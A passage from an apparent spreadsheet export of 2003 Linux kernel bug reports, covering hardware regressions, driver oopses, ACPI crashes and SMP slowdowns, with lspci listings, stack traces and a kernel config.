Subsystem: Voyetra Technologies: Unknown device 3357 Flags: bus master, slow devsel, latency 32, IRQ 5 00:1e.0 PCI bridge: nVidia Corporation nForce2 AGP (rev a2) (prog-if 00 [Normal decode]) Flags: bus master, 66Mhz, medium devsel, latency 32 Bus: primary=00, secondary=02, subordinate=02, sec-latency=32 Memory behind bridge: dc000000-ddffffff Prefetchable memory behind bridge: d8000000-dbffffff 01:09.0 Multimedia audio controller: Cirrus Logic CS 4614/22/24 [CrystalClear So undFusion Audio Accelerator] (rev 01) Subsystem: Voyetra Technologies: Unknown device 3357 Flags: bus master, slow devsel, latency 32, IRQ 5 Memory at de100000 (32-bit, non-prefetchable) [size=4K] Memory at de000000 (32-bit, non-prefetchable) [size=1M] Capabilities: [40] Power Management version 2 02:00.0 VGA compatible controller: nVidia Corporation NV28 [GeForce4 Ti 4200 AGP 8x] (rev a1) (prog-if 00 [VGA]) Flags: bus master, 66Mhz, medium devsel, latency 248, IRQ 10 Memory at dc000000 (32-bit, non-prefetchable) [size=16M] Memory at d8000000 (32-bit, prefetchable) [size=64M] Expansion ROM at &lt;unassigned&gt; [disabled] [size=128K] Capabilities: [60] Power Management version 2 Capabilities: [44] AGP version 3.0 "lspci -n" gives: 00:00.0 Class 0600: 10de:01e0 (rev a2) 00:00.1 Class 0500: 10de:01eb (rev a2) 00:00.2 Class 0500: 10de:01ee (rev a2) 00:00.3 Class 0500: 10de:01ed (rev a2) 00:00.4 Class 0500: 10de:01ec (rev a2) 00:00.5 Class 0500: 10de:01ef (rev a2) 00:01.0 Class 0601: 10de:0060 (rev a3) 00:01.1 Class 0c05: 10de:0064 (rev a2) 00:02.0 Class 0c03: 10de:0067 (rev a3) 00:02.1 Class 0c03: 10de:0067 (rev a3) 00:02.2 Class 0c03: 10de:0068 (rev a3) 00:04.0 Class 0200: 10de:0066 (rev a1) 00:08.0 Class 0604: 10de:006c (rev a3) 00:09.0 Class 0101: 10de:0065 (rev a2) 00:1e.0 Class 0604: 10de:01e8 (rev a2) 01:09.0 Class 0401: 1013:6003 (rev 01) 02:00.0 Class 0300: 10de:0281 (rev a1) tree /sys/bus/pci/drivers - gives: /sys/bus/pci/drivers |-- AEC62xx IDE | `-- new_id |-- AMD IDE | |-- 0000:00:09.0 -&gt; ../../../../devices/pci0000:00/0000:00:09.0 | `-- new_id |-- Sound Fusion CS46xx | |-- 0000:01:09.0 -&gt; ../../../../devices/pci0000:00/0000:00:08.0/0000:01:09.0 | `-- new_id |-- agpgart-nvidia | |-- 0000:00:00.0 -&gt; ../../../../devices/pci0000:00/0000:00:00.0 | `-- new_id |-- ehci_hcd | |-- 0000:00:02.2 -&gt; ../../../../devices/pci0000:00/0000:00:02.2 | `-- new_id |-- nForce2 SMBus | |-- 0000:00:01.1 -&gt; ../../../../devices/pci0000:00/0000:00:01.1 | `-- new_id |-- nvnet | |-- 0000:00:04.0 -&gt; ../../../../devices/pci0000:00/0000:00:04.0 | `-- new_id |-- ohci-hcd | |-- 0000:00:02.0 -&gt; ../../../../devices/pci0000:00/0000:00:02.0 | |-- 0000:00:02.1 -&gt; ../../../../devices/pci0000:00/0000:00:02.1 | `-- new_id `-- parport_pc `-- new_id 17 directories, 9 files "tree /sys/bus/i2c" gives: /sys/bus/i2c |-- devices `-- drivers |-- i2c_adapter `-- w83781d 4 directories, 0 files As I recall from pre-2.6 days, the /proc version of this sysfs would have shown many details about the h/w monitoring chips on the smbus so that a 'sensors'-like user-program could go in and monitor them, however:: this listing looks pretty flatline to me. Yes, it sees some devices, but is there really a way to access anything of use in the /sys tree as shown in those listings? Steps to reproduce: 1) modprobe i2c-nforce2; modprobe w87381d (87381d's code contains reference to my actual chip w83627hf as if it'll be parsed and its characteristics used). 2) look in the /sys tree for any actual h/w values as there used to be when I ran this h/w on the 2.4.23 kernel with lmsensors 2.8.0</t>
  </si>
  <si>
    <t>2.6.0-test4, test5, test6 very very slow with smp kernel</t>
  </si>
  <si>
    <t>2003-10-01 01:26 UTC</t>
  </si>
  <si>
    <t>zatalian</t>
  </si>
  <si>
    <t>2004-02-28 03:11 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Dell poweredge 2400 Dual PIII 733 Software Environment: kernel 2.6.0-test4, 2.6.0-test5, 2.6.0-test6 (both vanilla and mm-sources) Problem Description: When using an smp-kernel, my system become's very very slow. Just booting and shuting down takes more than 10 minutes. (used to be ~ 1 minute). Everything seems to work except it's to slow to be usefull. e.g. looking at the gkrellm monitor : it updates once every 3 seconds or so. as a test, i compiled 2.6.0-test6-mm1 without smp and everything works normal. the last kernel that works normal on my system is 2.6.0-test2-mm1 I noticed this in my dmesg when booting with smp that's not there when i boot without smp : Losing too many ticks! TSC cannot be used as a timesource. (Are you running with SpeedStep?) Falling back to a sane timesource. i don't know if it has anything to do with it. i tried both anticipatory and cfq scheduler Steps to reproduce: boot with smp-kernel</t>
  </si>
  <si>
    <t>cpu sibling map incorrect on x445</t>
  </si>
  <si>
    <t>2003-10-01 14:31 UTC</t>
  </si>
  <si>
    <t>2003-11-20 20:35 UTC</t>
  </si>
  <si>
    <t>James Cleverdon</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: x445 Software Environment: 2.6.0-test6 Problem Description: cpu sibling map is wrong: cpu_sibling_map[0] = 4 cpu_sibling_map[1] = 5 cpu_sibling_map[2] = 6 cpu_sibling_map[3] = 7 cpu_sibling_map[4] = 0 cpu_sibling_map[5] = 1 cpu_sibling_map[6] = 2 cpu_sibling_map[7] = 3 cpu_sibling_map[8] = 0 cpu_sibling_map[9] = 1 cpu_sibling_map[10] = 2 cpu_sibling_map[11] = 3 cpu_sibling_map[12] = 0 cpu_sibling_map[13] = 1 cpu_sibling_map[14] = 2 cpu_sibling_map[15] = 3 cpu_sibling_map[16] = 0 cpu_sibling_map[17] = 1 cpu_sibling_map[18] = 2 cpu_sibling_map[19] = 3 cpu_sibling_map[20] = 0 cpu_sibling_map[21] = 1 cpu_sibling_map[22] = 2 cpu_sibling_map[23] = 3 cpu_sibling_map[24] = 0 cpu_sibling_map[25] = 1 cpu_sibling_map[26] = 2 cpu_sibling_map[27] = 3 cpu_sibling_map[28] = 0 cpu_sibling_map[29] = 1 cpu_sibling_map[30] = 2 cpu_sibling_map[31] = 3 Should look like: cpu_sibling_map[0] = 16 cpu_sibling_map[1] = 17 cpu_sibling_map[2] = 18 cpu_sibling_map[3] = 19 cpu_sibling_map[4] = 20 ...and so on... Looks like this has to do with an invalid physical proc id: chips:~ # cat /proc/cpuinfo | grep phys | more physical id : 0 physical id : 1 physical id : 2 physical id : 3 physical id : 0 physical id : 1 physical id : 2 physical id : 3 physical id : 0 physical id : 1 physical id : 2 physical id : 3 physical id : 0 physical id : 1 physical id : 2 physical id : 3 physical id : 0 physical id : 1 physical id : 2 physical id : 3 physical id : 0 physical id : 1 physical id : 2 physical id : 3 physical id : 0 physical id : 1 physical id : 2 physical id : 3 physical id : 0 physical id : 1 physical id : 2 physical id : 3</t>
  </si>
  <si>
    <t>acpi_php oopses if acpi is disabled</t>
  </si>
  <si>
    <t>2.4.23-pre6</t>
  </si>
  <si>
    <t>2003-10-01 17:57 UTC</t>
  </si>
  <si>
    <t>2004-03-04 19:04 UTC</t>
  </si>
  <si>
    <t>acpi_php doesn't seem to handle acpi_disabled = 1 very well - it oopses.</t>
  </si>
  <si>
    <t>Christian Kujau</t>
  </si>
  <si>
    <t>reduce size of minimal ACPI config</t>
  </si>
  <si>
    <t>2.4.22-pre6</t>
  </si>
  <si>
    <t>2003-10-02 20:21 UTC</t>
  </si>
  <si>
    <t>2006-02-02 14:27 UTC</t>
  </si>
  <si>
    <t>since we made CONFIG_ACPI_BOOT default for most interesting configurations, the size of ACPI has come under scrutiny. One offender is this: +static struct acpi_table_sdt sdt_entry[ACPI_MAX_TABLES]; It should be __initdata, and ACPI_MAX_TABLES's value should be confirmed.</t>
  </si>
  <si>
    <t>2003-10-03 06:47 UTC</t>
  </si>
  <si>
    <t>Oded Comay</t>
  </si>
  <si>
    <t>2005-05-30 12:58 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 9 Hardware Environment: dual Xeon 2.8GHz + Intel e1000 NIC Software Environment: Kernel: Arjan's 2.6.0-0.test4.1.33smp e1000 driver: Intel(R) PRO/1000 Network Driver - version 4.3.2-k1 NAPI (020618) Problem Description: The PACKET_RX_RING mechanism (enabled by CONFIG_PACKET_MMAP) appears to be somewhat broken in 2.6.0. There are 3 issues: 1. In 2.4 one could call bind() and setsockopt(PACKET_RX_RING) in any order. In 2.6.0, when calling setsockopt() after calling bind(), no error is returned, but also no packet is delivered to the userspace ring. 2. Performance in 2.6.0 is much lower than in 2.4. As an example, using the same hardware and under the same traffic load, the attached sample program could process 177K packets/sec in 2.4, but only 70K packets/sec in 2.6.0. 3. The getsockopt(PACKET_STATISTICS) call returns 0 dropped packets, although some packets were apparently dropped. This is assumed since in the above test, and although some 100K packets/sec were not processed, the call returned no dropped packets. Steps to reproduce: The attached program, based on Gianni Tedesco's lincap.c, demonstrates the 3 issues. Usage: ./lincap -i device -b -a -p -i device device to sniff. -b bind before setsockopt. -a bind after setsockopt. -p print packets. When invoked with -b (and -p) the program will not process packets under 2.6.0, but works fine in 2.4. With -a it works in both 2.6.0 and 2.4. The output of the program when run in 2.4.20 and 2.6.0-test4 under heavy traffic load is attached. It shows the performance difference, as well as the fact that in 2.6.0 the packet per poll() ratio is 1, while it is 24 in 2.4.20. It also shows that no dropped packets are reported.</t>
  </si>
  <si>
    <t>amd64_agp.c wonkiness - MAX_HAMMER_GARTS wrong on UP</t>
  </si>
  <si>
    <t>2003-10-03 13:51 UTC</t>
  </si>
  <si>
    <t>Eric W. Sprague</t>
  </si>
  <si>
    <t>2004-04-06 12:34 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 8.2 Hardware Environment: MSI K8T Neo/Athlon64 3200+, 1GB RAM Software Environment: SuSE 8.2 stock except kernel (2.4.22/2.6.0-test6) Problem Description: The amd64 AGP driver fails, claiming 'too many northbridges for AGP' when configured for uniprocessor. (MB is uniprocessor). Works when configured for SMP or when MAX_HAMMER_GARTS is increased. Steps to reproduce:</t>
  </si>
  <si>
    <t>S3 resume: RTC fails to wakeup system</t>
  </si>
  <si>
    <t>2.6.0-test6 and others</t>
  </si>
  <si>
    <t>2003-10-03 16:33 UTC</t>
  </si>
  <si>
    <t>Karol Kozimor</t>
  </si>
  <si>
    <t>2005-01-21 21:41 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: ASUS L3800C laptop, i845MP chipset Software Environment: 2.6.0-test6, but also tried 2.6.0-test5-mm4 and 2.6.0-test6-mm2 Problem Description: When trying to set /proc/acpi/alarm, "irq 9: nobody cared!" is printed, followed by a call trace and "Disabling IRQ #9". The wake-up event is issued, however, and the system resumes from various sleep states (S1, S3, S4 tested), but no further ACPI events are reported (except those triggered explicitely by _WAK method). If uhci-hcd.ko is loaded (or quite possibly, if the specific interrupt is shared), the system will just hang (so that only power-off override works and the fan starts spinning fast after a while) instead of printing anything. This is also the typical 2.4.x behaviour, regardless of the modules loaded. Steps to reproduce: echo "yyyy-mm-dd hh:mm:ss" &gt; /proc/acpi/alarm Other information: Typical /proc/interrupt contents (from 2.4.22+ACPI 20030918, but the 2.6.0-test6 output is more or less identical): CPU0 0: 160595 XT-PIC timer 1: 9677 XT-PIC keyboard 2: 0 XT-PIC cascade 5: 63545 XT-PIC Ricoh Co Ltd RL5c476 II, usb-uhci, radeon@PCI:1:0:0 8: 1 XT-PIC rtc 9: 113 XT-PIC acpi, ohci1394, usb-uhci 11: 80679 XT-PIC Ricoh Co Ltd RL5c476 II (#2), PCTel, Intel 82801CA-ICH3 12: 63928 XT-PIC PS/2 Mouse 14: 13463 XT-PIC ide0 15: 224 XT-PIC ide1 NMI: 0 ERR: 0 More information (dmidecode, DSDT, etc.) can be found here: http://bugme.osdl.org/show_bug.cgi?id=1185 (bug #1185 concerns the same laptop)</t>
  </si>
  <si>
    <t>2.6.0-test7</t>
  </si>
  <si>
    <t>2003-10-03 22:06 UTC</t>
  </si>
  <si>
    <t>2004-01-25 21:56 UTC</t>
  </si>
  <si>
    <t>Distribution: Red Hat 9.0 (both local and remote computers) Hardware Environment: Local: Athlon, ATI+ALi combo, 512 MB RAM, IDE HDD, RTL 8139 C+ (8139cp) Fast Ethernet card Remote: Athlon, ALi, 512 MB RAN, IDE HDD, DEC Tulip Ethernet card Software Environment: Local: 2.6.0-test6 (vesa driver for XFree86, KDE/Konsole) Remote: 2.4.23-pre6 Problem Description: Kernel hangs while executing "make menuconfig" from a remote computer. Steps to reproduce: 1. Consider 2 computers: laptop (local), desktop (remote) 2. From laptop computer under KDE's Konsole ssh to desktop 3. Execute make menuconfig (2.4.23-pre6 source tree in my case) on the remote computer. 4. Exit and restart it few times (in my case it hangs within a dozen attempts) 5. The local computer hangs. Remote computer is fine. It doesn't happen if I try the same from Console terminals. And it doesn't happen under 2.4.23-pre6 on the same local computer. Thanks Srihari harisri@bigpond.com</t>
  </si>
  <si>
    <t>Pekka Pietikainen</t>
  </si>
  <si>
    <t>assembler warnings during make</t>
  </si>
  <si>
    <t>linux-2.6.0-test6-bk(6|7)</t>
  </si>
  <si>
    <t>2003-10-05 06:00 UTC</t>
  </si>
  <si>
    <t>Mitchel Sahertian</t>
  </si>
  <si>
    <t>2003-11-02 04:32 UTC</t>
  </si>
  <si>
    <t>atp870u driver oops</t>
  </si>
  <si>
    <t>2.6.0-test6-mm4 (&gt;=2.5.74 in general)</t>
  </si>
  <si>
    <t>2003-10-06 09:20 UTC</t>
  </si>
  <si>
    <t>Ahmed F.</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: P4 2.2ghz, 384MB RDRAM Software Environment: gcc-3.3.1.20030916, glibc-2.3.2.20030919 + nptl 0.60 Problem Description: modprobing the driver just oops (and some times locks up the computer) Steps to reproduce: 1. make menuconfug 2. compile atp870u as a module 3. modprobe/insmod it results : aec671x_detect: ACARD AEC-671X PCI Ultra/W SCSI-3 Host Adapter: 0 IO:df00, IRQ:23. ID: 6 MATSHITACD-R CW-7503 1.09 ID: 7 Host Adapter Unable to handle kernel NULL pointer dereference at virtual address 000004ac printing eip: d9b7e022 *pde = 00000000 Oops: 0000 [#1] PREEMPT CPU: 0 EIP: 0060:[&lt;d9b7e022&gt;] Not tainted VLI EFLAGS: 00010202 EIP is at atp870u_detect+0x13f/0x91e [atp870u] eax: 00000001 ebx: ffffffff ecx: 00000001 edx: 00000398 esi: 0000df3b edi: 00000033 ebp: d6444000 esp: d5975bfc ds: 007b es: 007b ss: 0068 Process modprobe (pid: 4968, threadinfo=d5974000 task=d65c86a0) Stack: c032b220 0000df00 00000040 d9b7ed7a d6444000 c013c1ea 00000001 00000000 d64441bc 0000df3a c032c954 d5974000 00000001 0000df00 00000282 07170154 0000df00 00000000 0000df20 00000000 002000a0 c032c907 00000010 c032cb9c Call Trace: [&lt;c013c1ea&gt;] buffered_rmqueue+0xd6/0x182 [&lt;c0145aa9&gt;] do_anonymous_page+0x133/0x224 [&lt;c0146100&gt;] handle_mm_fault+0xd6/0x166 [&lt;c011c1f7&gt;] do_page_fault+0x31a/0x4ff [&lt;c017a8ec&gt;] load_elf_binary+0x5c9/0xb51 [&lt;c01381e6&gt;] find_get_page+0x2d/0x56 [&lt;c01393e4&gt;] filemap_nopage+0x273/0x301 [&lt;c0145d7f&gt;] do_no_page+0x1e5/0x376 [&lt;c0146100&gt;] handle_mm_fault+0xd6/0x166 [&lt;c011c1f7&gt;] do_page_fault+0x31a/0x4ff [&lt;c013bdba&gt;] __rmqueue+0xcc/0x131 [&lt;c013c1ea&gt;] buffered_rmqueue+0xd6/0x182 [&lt;c014d7dc&gt;] map_area_pmd+0x66/0x8e [&lt;c014d6ca&gt;] unmap_area_pmd+0x4b/0x56 [&lt;d9b7b000&gt;] atp870u_intr_handle+0x0/0x78e [atp870u] [&lt;c014dbbc&gt;] vfree+0x27/0x35 [&lt;c0135e4d&gt;] load_module+0x6d4/0x908 [&lt;d9b7eb7a&gt;] atp870u_release+0x0/0xa6 [atp870u] [&lt;d9b8203e&gt;] init_this_scsi_driver+0x3e/0xf4 [atp870u] [&lt;c0136198&gt;] sys_init_module+0x117/0x228 [&lt;c02d259b&gt;] syscall_call+0x7/0xb Code: ff c6 44 24 3d 00 c7 44 24 18 00 00 00 00 21 e2 89 54 24 2c 8b 44 24 18 8b 4c 24 30 8b 94 84 40 03 00 00 85 d2 0f 84 60 03 00 00 &lt;8b&gt; 82 14 01 00 00 89 44 24 34 0f b6 82 0c 01 00 00 88 44 24 3e</t>
  </si>
  <si>
    <t>console gets garbled when running X-windows in higher resolution</t>
  </si>
  <si>
    <t>2.6.0-test5 - 2.6.0-test6-bk6</t>
  </si>
  <si>
    <t>2003-10-07 11:44 UTC</t>
  </si>
  <si>
    <t>Monchi</t>
  </si>
  <si>
    <t>2005-08-15 17:37 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 9.1 Hardware Environment: Matrox Millenium II AMD Athlon 1.1 ghz 756MB ram Software Environment: kernel console + XFree86 4.3 Problem Description: High resolution console gets garbled when X running at higher resolution then the console Steps to reproduce: Compile kernel with Matroxfb and use video option 'matroxfb:vesa:0x193' when booting. Then start an X session, with mga driver in stead of fbdev driver, make sure the X-session is running at a higher resolution then the console, and switch from the X-session to the console. Now run ls or simply clear screen. This is all it takes for me to get garbled console results. To go back to a normal console simple run X with the same resolution as the console. ( maybe using the fbdev driver ).</t>
  </si>
  <si>
    <t>from 2.6.0-test6 to 2.6.0-test6-bk8</t>
  </si>
  <si>
    <t>2003-10-07 12:14 UTC</t>
  </si>
  <si>
    <t>2003-10-20 10:05 UTC</t>
  </si>
  <si>
    <t>2.6.0-test7 oops in proc_pid_stat</t>
  </si>
  <si>
    <t>2003-10-09 12:36 UTC</t>
  </si>
  <si>
    <t>Olaf Hering</t>
  </si>
  <si>
    <t>2003-11-12 23:23 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE SLES8 i386 Hardware Environment: IBM Blade center, 2 xeon cpus, 2.4Ghz, 512MB Software Environment:gcc3.2.2 Problem Description: pstree -V pstree (psmisc) 21.3 Unable to handle kernel NULL pointer dereference at virtual address 0000003c virtual address is always the same. oops one, reported to the lkml: Linux version 2.6.0-test7 (olaf@zert152) (gcc version 3.2.2) #2 SMP Thu Oct 9 08:49:29 CEST 2003 Unable to handle kernel NULL pointer dereference at virtual address 0000003c printing eip: c018a322 *pde = 00000000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c018a322&gt;] Not tainted EFLAGS: 00010246 EIP is at proc_pid_stat+0x92/0x510 eax: 00000000 ebx: df2b0d80 ecx: 00000000 edx: c038afcc esi: 00000000 edi: df2b0d80 ebp: 00000000 esp: ce85de3c ds: 007b es: 007b ss: 0068 Process pstree (pid: 3518, threadinfo=ce85c000 task=dbb38c80) Stack: df94b900 c034f440 00000dad df6b5bda 00000053 00000d99 00000419 00000419 0000040d 00000419 00000100 00000086 000000e0 00000106 00000284 00000000 cf6419b4 cf641940 ce136006 c0187ce8 df2b0d80 cf641940 ce85df38 dffd3820 Call Trace: [&lt;c0187ce8&gt;] pid_revalidate+0x28/0xd0 [&lt;c0170300&gt;] dput+0x30/0x1b0 [&lt;c0140ac3&gt;] buffered_rmqueue+0xc3/0x150 [&lt;c0140c00&gt;] __alloc_pages+0xb0/0x350 [&lt;c0187174&gt;] proc_info_read+0x74/0x160 [&lt;c015904e&gt;] vfs_read+0xbe/0x130 [&lt;c01592f2&gt;] sys_read+0x42/0x70 [&lt;c010b52f&gt;] syscall_call+0x7/0xb Code: 8b 48 3c 85 c9 74 40 8b 81 98 00 00 00 89 84 24 d4 00 00 00 config is all static. I was reading a CD in the foreground and 2 rpm builds in the background. another one after reboot: Unable to handle kernel NULL pointer dereference at virtual address 0000003c printing eip: c018a322 *pde = 00000000 Oops: 0000 [#3] CPU: 1 EIP: 0060:[&lt;c018a322&gt;] Not tainted EFLAGS: 00010246 EIP is at proc_pid_stat+0x92/0x510 eax: 00000000 ebx: df8798e0 ecx: 00000000 edx: c038afcc esi: 00000000 edi: df8798e0 ebp: 00000000 esp: ca841e3c ds: 007b es: 007b ss: 0068 Process pstree (pid: 2218, threadinfo=ca840000 task=df58d9a0) Stack: d0301000 c034f440 000008a9 df879bda 0000005a 00000899 00000419 00000419 0000040d 00000419 00000104 0000001e 00000000 00000090 00000000 00000000 00000000 00000000 00000000 00000022 00000009 00000000 00000000 001efdc0 Call Trace: [&lt;c0140ac3&gt;] buffered_rmqueue+0xc3/0x150 [&lt;c0140c00&gt;] __alloc_pages+0xb0/0x350 [&lt;c0187174&gt;] proc_info_read+0x74/0x160 [&lt;c015904e&gt;] vfs_read+0xbe/0x130 [&lt;c01592f2&gt;] sys_read+0x42/0x70 [&lt;c010b52f&gt;] syscall_call+0x7/0xb Code: 8b 48 3c 85 c9 74 40 8b 81 98 00 00 00 89 84 24 d4 00 00 00 Anton Blanchard sees the same on ppc64, but I dont have details. Steps to reproduce: 'it happens' after maybe 6 hours uptime. system is busy building packages in the background, pstree calls are part of the build process management. There is a while loop to read from the USB cdrom ( the reason why I did boot 2.6): screen -S cdtest -- sh -c 'for i in `seq 0 420` `seq 0 420` ; do date; umount -v /media/cdrom ; mount -v /media/cdrom ; find /media/cdrom -type f -print0 | xargs -0 --verbose -n1 cat &gt; /dev/null || break ; done &amp;&gt;log'</t>
  </si>
  <si>
    <t>sleeping function called from invalid context</t>
  </si>
  <si>
    <t>2003-10-10 02:58 UTC</t>
  </si>
  <si>
    <t>2005-07-02 18:44 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: Gateway PC, Intel Pentium III (Katmai) 450Mhz, Intel 440BX Chipset, 640Mb RAM Software Environment: Gnu C 3.3.2 Gnu make 3.80 util-linux 2.12 mount 2.12 e2fsprogs 1.35-WIP nfs-utils 1.0.5 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.1.12 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.0 Modules Loaded nfsd exportfs lockd sunrpc reiserfs 8250 serial_core eepro100 mii rtc Problem Description: The following message appeared on the system log: Debug: sleeping function called from invalid context at include/asm/uaccess.h:473 in_atomic():0, irqs_disabled():1 Call Trace: [&lt;c011bd58&gt;] __might_sleep+0x88/0x90 [&lt;c010c55f&gt;] save_v86_state+0x6f/0x1f0 [&lt;c010d017&gt;] handle_vm86_fault+0xb7/0xa10 [&lt;c0141e21&gt;] do_no_page+0x191/0x2f0 [&lt;c0140fc6&gt;] zeromap_pte_range+0x36/0x70 [&lt;c010b070&gt;] do_general_protection+0x0/0xa0 [&lt;c010a399&gt;] error_code+0x2d/0x38 [&lt;c010a1ef&gt;] syscall_call+0x7/0xb Steps to reproduce: I don't have a method to reproduce - this just appeared in the log.</t>
  </si>
  <si>
    <t>ACPICA 20030918 crash on boot -test7 and later</t>
  </si>
  <si>
    <t>2003-10-10 08:10 UTC</t>
  </si>
  <si>
    <t>Olivier Mondoloni</t>
  </si>
  <si>
    <t>2004-03-04 12:09 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux 1.4 Hardware Environment: Compaq X1005EA Intel Centrino Architecture Software Environment: Linux kernel startup Problem Description: at startup, there is a big kernel crash (error messages with kernel panic at the end). Steps to reproduce: activate normal acpi functions without ASUS and Toshiba addons on this type of notebook and you will see messages like this : [&lt;c01ee9b2&gt;] acpi_ns_evaluate_by_handle+0xce/0x11a [&lt;c01ee760&gt;] acpi_ns_evaluate_relative+0x134/0x17d [&lt;c01fac4f&gt;] acpi_ut_status_exit+0x33/0x59 [&lt;c01faeb4&gt;] acpi_ut_evaluate_object+0x3c/0x194 [&lt;c01f71f9&gt;] acpi_rs_get_crs_method_data+0x3f/0x7b [&lt;c01f5466&gt;] acpi_get_current_resources+0x64/0x86 [&lt;c01fab6a&gt;] acpi_ut_trace+0x29/0x2b [&lt;c020137f&gt;] acpi_pci_evaluate_crs+0x49/0xa6 [&lt;c0201581&gt;] acpi_pci_root_add+0x1a5/0x2c3 [&lt;c0204a57&gt;] acpi_bus_driver_init+0x71/0x141 [&lt;c0204f00&gt;] acpi_bus_find_driver+0xd6/0xe8 [&lt;c02053fb&gt;] acpi_bus_add+0x14a/0x1de [&lt;c0205591&gt;] acpi_bus_scan+0x102/0x196 [&lt;c03727db&gt;] do_initcalls+0x2b/0xa0 [&lt;c0130ca2&gt;] init_workqueues+0x12/0x30 [&lt;c01070d0&gt;] init+0x30/0x130 [&lt;c01070a0&gt;] init+0x0/0x130 [&lt;c010a219&gt;] kernel_thread_helper+0x5/0xc code:e9 51 ff ff ff c7 45 ec 08 00 00 00 83 cf 01 eb b9 8b 45 14 8b 55 e8 83 45 14 04 8b 08 b8 aa f4 2d c0 85 c9 0f 44 c8 89 c8 eb 06 &lt;80&gt; 38 00 74 07 40 4a 83 fa ff 75 f4 29 c8 83 e7 10 89 c3 75 1d &lt;0&gt;Kernel panic : Attempted to kill init! The only workaround I found is to deactivate ACPI and use APM but now I don't see the level charge of the battery. I tried also the latest ACPI patch with the 2.6.0-test6 kernel but I had the same error messages and so the same kernel behaviour.</t>
  </si>
  <si>
    <t>can't pass actual memory size to kernel anymore</t>
  </si>
  <si>
    <t>2003-10-10 14:22 UTC</t>
  </si>
  <si>
    <t>Ger Groeneveld</t>
  </si>
  <si>
    <t>2003-10-22 09:59 UTC</t>
  </si>
  <si>
    <t>Distribution: None, download from kernel.org Hardware Environment: Compaq Proliant 5000 SMP 4 Pentium Pro, 512 Mb, 2 SMART/2 RAID controllers, No IDE controllers, SCSI tape/cdrom Software Environment: Base linux system currently running 2.4.22 Problem Description: memory size passed to kernel (with LILO) is not accepted. Without memory sizing kernel recognise the first 16Mb, not more. with mem=496M@16M append line the kernels (up to 2.4.22) will recognize all of the memory (all 512Mb). Starting with 2.4.22 it will not accept 512M@0 nor the hexidecimal notation in the lilo.conf (systems hangs). That methode did work upto 2.4.20. Steps to reproduce: build kernel, boot kernel (from floppy, initrd ), type mem=496M@16M at boot prompt --&gt; system boots but uses only 12Mb (cat /proc/meminfo).</t>
  </si>
  <si>
    <t>processor.c using byte IO even if DSDT prescribes otherwise</t>
  </si>
  <si>
    <t>2.4.23-pre7 + ACPI 20031006164230</t>
  </si>
  <si>
    <t>2003-10-12 05:00 UTC</t>
  </si>
  <si>
    <t>Mario Lorenz</t>
  </si>
  <si>
    <t>2004-03-04 12:10 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: Asus M2400N Centrino Software Environment: Bios 0206; see DSDT in Repository Problem Description: ACPI Processor Performance level setting does not work on this Notebook. The reason for this is that processor.c uses outb() byte writes to write to the power control register, even tho the DSDT prescribes otherwise (see PPCT Ressource template in the DSDT, the register has a length of 0x10, and the value is a 16bit value too) Changing the u8 typecasts to u16 and putting in an outw() - et voila: ACPI performance level setting starts to work. The propper fix would probably be to do away with outb() completely and use proper ACPI generic adresses. This would also accomodate the alternate PCT/PSS Methods from the DSDT which use the Centrino MSR directly, and no IO at all. That in turn does depend uppon support of FFixedHW Address Types. Is this planned ? I furthermore do wonder if this is somehow related to #1269, after all, its about the same (0x82) register. What I also noticed: switching the performance level does not update /proc/cpuinfo (using speedstep-centrino patches, it does), and therefore internal clock/timers could possibly be wrong after a performance level change ? Steps to reproduce: load processor.o on a M2400N. Observe processsor performance switching does not work. Patch processor.c replacing the outb() with outw() and expanding the value cast from u8 to u16. recompile insert module observe ACPI processor performance switching does work now.</t>
  </si>
  <si>
    <t>freeze on loading alsa maestro3 driver</t>
  </si>
  <si>
    <t>2003-10-12 14:45 UTC</t>
  </si>
  <si>
    <t>juan c.</t>
  </si>
  <si>
    <t>2003-11-06 15:37 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sid Hardware Environment: Dell C600 bios A22, ESS Technology ES1983S Maestro-3i PCI Audio Accelerator (rev 10) Software Environment: Problem Description: When i load the maestro3 module, be it OSS or alsa , the machine freezes 2 seconds later. This happends most of the time. Some times it freezes instantly or sometimes not. Sometimes i get 'spurious APIC interrupt on CPU#0, should never happen' i tried with/without acpi,apm even with an older kernel 2.4.18 ... same freeze Steps to reproduce: The main problem with this bug is that it's reproducable. here is my config : ---------------------- # # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y CONFIG_CLEAN_COMPILE=y CONFIG_STANDALONE=y CONFIG_BROKEN_ON_SMP=y # # General setup # CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_BSD_PROCESS_ACCT=y CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=14 # CONFIG_IKCONFIG is not set # CONFIG_EMBEDDED is not set CONFIG_KALLSYMS=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y # CONFIG_MODULE_FORCE_UNLOAD is not set CONFIG_OBSOLETE_MODPARM=y # CONFIG_MODVERSIONS is not set CONFIG_KMOD=y # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # 